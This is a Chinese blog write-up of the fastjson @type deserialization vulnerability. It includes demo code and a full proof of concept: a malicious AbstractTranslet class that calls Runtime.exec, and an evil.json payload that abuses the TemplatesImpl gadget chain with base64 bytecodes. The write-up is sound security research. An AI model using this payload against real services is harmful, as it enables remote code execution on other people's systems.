Java处理JSON数据有三个比较流行的类库,gson(google维护)、jackson、以及今天的主角fastjson,fastjson是阿里巴巴一个开源的json相关的java library,地址在这里,
https://github.com/alibaba/fastjson,
Fastjson可以将java的对象转换成json的形式,也可以用来将json转换成java对象,效率较高,被广泛的用在web服务以及android上,它的JSONString()方法可以将java的对象转换成json格式,同样通过parseObject方法可以将json数据转换成java的对象。
大概在4月18号的时候,fastjson进行了一次安全更新,通告在这里
https://github.com/alibaba/fastjson/wiki/security_update_20170315,
当时对这也不熟悉,断断续续看了几天也没什么收获(主要是因为太菜了TAT)。最近有人出了poc以及分析的文章就跟进了一下,漏洞还是挺有意思。
工欲善其事,必先利其器,要想研究这个漏洞,就要先要了解这个fastjson是干什么的。自己研究了一下这个类库。User.java code如下:
testFastJson.java code如下:
package fastjsonVul.fastjsonTest;
import java.util.HashMap;
import java.util.Map;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.serializer.SerializerFeature;
import fastjsonVul.fastjsonTest.User;
public class testFastJson {
public static void main(String[] args){
Map map = new HashMap();
map.put("key1","One");
map.put("key2", "Two");
String mapJson = JSON.toJSONString(map);
System.out.println(mapJson);
User user1 = new User();
user1.setUsername("果汁简历");
user1.setSex("male");
System.out.println("obj name:"+user1.getClass().getName());
//序列化
String serializedStr = JSON.toJSONString(user1);
System.out.println("serializedStr="+serializedStr);
String serializedStr1 = JSON.toJSONString(user1,SerializerFeature.WriteClassName);
System.out.println("serializedStr1="+serializedStr1);
//通过parse方法进行反序列化
User user2 = (User)JSON.parse(serializedStr1);
System.out.println(user2.getUsername());
System.out.println();
//通过parseObject方法进行反序列化 通过这种方法返回的是一个JSONObject
Object obj = JSON.parseObject(serializedStr1);
System.out.println(obj);
System.out.println("obj name:"+obj.getClass().getName()+"\n");
//通过这种方式返回的是一个相应的类对象
Object obj1 = JSON.parseObject(serializedStr1,Object.class);
System.out.println(obj1);
System.out.println("obj1 name:"+obj1.getClass().getName());
}
}
输出是这样
{"key1":"One","key2":"Two"}
obj name:fastjsonVul.fastjsonTest.User
serializedStr={"Sex":"male","Username":"果汁简历","sex":"male","username":"果汁简历"}
serializedStr1={"@type":"fastjsonVul.fastjsonTest.User","Sex":"male","Username":"xiaoming","sex":"male","username":"果汁简历"}
果汁简历
{"Username":"果汁简历","Sex":"male","sex":"male","username":"果汁简历"}
obj name:com.alibaba.fastjson.JSONObject
fastjsonVul.fastjsonTest.User@18769467
obj1 name:fastjsonVul.fastjsonTest.User
fastjson漏洞出现的地方也就是JSON.parseObject这个方法上面。
在最开始的时候,只能通过类初始化时候的构造函数或者变量的setter方法执行恶意代码,像是这样
Evil.java
import java.io.IOException;
public class Evil {
public String getName() {
System.out.println("i am getterName!");
return name;
}
public void setName(String name) {
System.out.println("i am setterName!");
this.name = name;
}
public String name;
public int getAge() {
System.out.println("i am getterAge!");
return age;
}
public void setAge(int age) {
System.out.println("i am setterAge!");
this.age = age;
}
private int age;
public Evil() throws IOException{
System.out.println("i am constructor!");
}
}
import com.alibaba.fastjson.JSON;
import java.io.*;
public class App{
public static void readToBuffer(StringBuffer buffer, String filePath) throws IOException {
InputStream is = new FileInputStream(filePath);
String line; // 用来保存每行读取的内容
BufferedReader reader = new BufferedReader(new InputStreamReader(is));
line = reader.readLine(); // 读取第一行
while (line != null) { // 如果 line 为空说明读完了
buffer.append(line); // 将读到的内容添加到 buffer 中
buffer.append("\n"); // 添加换行符
line = reader.readLine(); // 读取下一行
}
reader.close();
is.close();
}
public static void main( String[] args ) throws IOException
{
StringBuffer Buffer = new StringBuffer();
App.readToBuffer(Buffer,"/Users/m0rk/vul/fastjson/src/demo.json");
Object obj = JSON.parseObject(Buffer.toString());
}
}
demo.json的内容如下
{
"@type" : "Evil1",
"name" : "M0rk",
"age" : "20"}
可以看到通过@type"特性",就执行了构造函数以及私有和公有成员变量的getter和setter方法。但是这貌似还并没有达到我们想要的结果,因为上面的情况是需要我们能够控制Evil这个类(一般是通过文件写入),目前来看不太现实。
还有一种方法就是将编译好的.class或者.jar文件转换成byte[],然后通过defineClass加载byte[]返回class对象。
安全研究人员发现了这个类
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
这个类存在如下的调用链可加载byte[]完成.class文件中对象的实例化,注意MailCiousClass需要继承AbstractTranslet(在defineTransle方法中存在一个校验)。更多这个调用链参考链接
https://gist.github.com/frohoff/24af7913611f8406eaf3
如上图所示的攻击调用栈信息,可以看到和TemplatesImpl调用链完全吻合,最终还是通过defineclass加载了bytecodes[]导致了命令执行。
Evil.java
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.IOException;
public class Evil extends AbstractTranslet {
public Evil() throws IOException {
Runtime.getRuntime().exec("open /Applications/Calculator.app");
}
@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) {
}
public void transform(DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] handlers) throws TransletException {
}
}
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import org.apache.commons.io.IOUtils;
import org.apache.commons.codec.binary.Base64;
import java.io.*;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
public class poc {
public static String readClass(String cls) {
ByteArrayOutputStream bos = new ByteArrayOutputStream();
try {
IOUtils.copy(new FileInputStream(new File(cls)), bos);
} catch (IOException e) {
e.printStackTrace();
}
return Base64.encodeBase64String(bos.toByteArray());
}
public static void main(String args[]) throws Exception{
// final String evilClassPath ="/Users/m0rk/vul/fastjson/src/Evil.class";
// String evilCode = readClass(evilClassPath);
// System.out.println(evilCode);
StringBuffer Buffer = new StringBuffer();
App.readToBuffer(Buffer, "/Users/m0rk/vul/fastjson/src/evil.json");
Object obj = JSON.parseObject(Buffer.toString(),Object.class,Feature.SupportNonPublicField);
}
}
evil.json
{
"@type" : "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
"_bytecodes" : ["yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQAJdHJhbnNmb3JtAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgcAGwEAClNvdXJjZUZpbGUBAAlFdmlsLmphdmEMAAcACAcAHAwAHQAeAQAhb3BlbiAvQXBwbGljYXRpb25zL0NhbGN1bGF0b3IuYXBwDAAfACABAARFdmlsAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAE2phdmEvaW8vSU9FeGNlcHRpb24BADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAGAAAAAAADAAEABwAIAAIACQAAAC4AAgABAAAADiq3AAG4AAISA7YABFexAAAAAQAKAAAADgADAAAACQAEAAoADQALAAsAAAAEAAEADAABAA0ADgABAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAADgABAA0ADwACAAkAAAAZAAAAAwAAAAGxAAAAAQAKAAAABgABAAAAEQALAAAABAABABAAAQARAAAAAgAS"],
"_name" : "M0rk",
"_tfactory" : {},
"outputProperties" : {}
}
关于这个漏洞的构造还是挺精巧,漏洞的利用条件比较苛刻,如要能够利用,开发人员对json的处理函数需要是 JSON.parseObject(input, Object.class,
Feature.SupportNonPublicField);
而大部分的开发可能用用JSON.parse(input)就了事儿了,同时使用了parseObject和
Feature.SupportNonPublicField设置的估计不多。所以说实际环境中挖掘fastjson的这个漏洞应该是可遇不可求。
https://blog.csdn.net/weixin_45132238/article/details/106357002
https://blog.csdn.net/weixin_45132238/article/details/106526166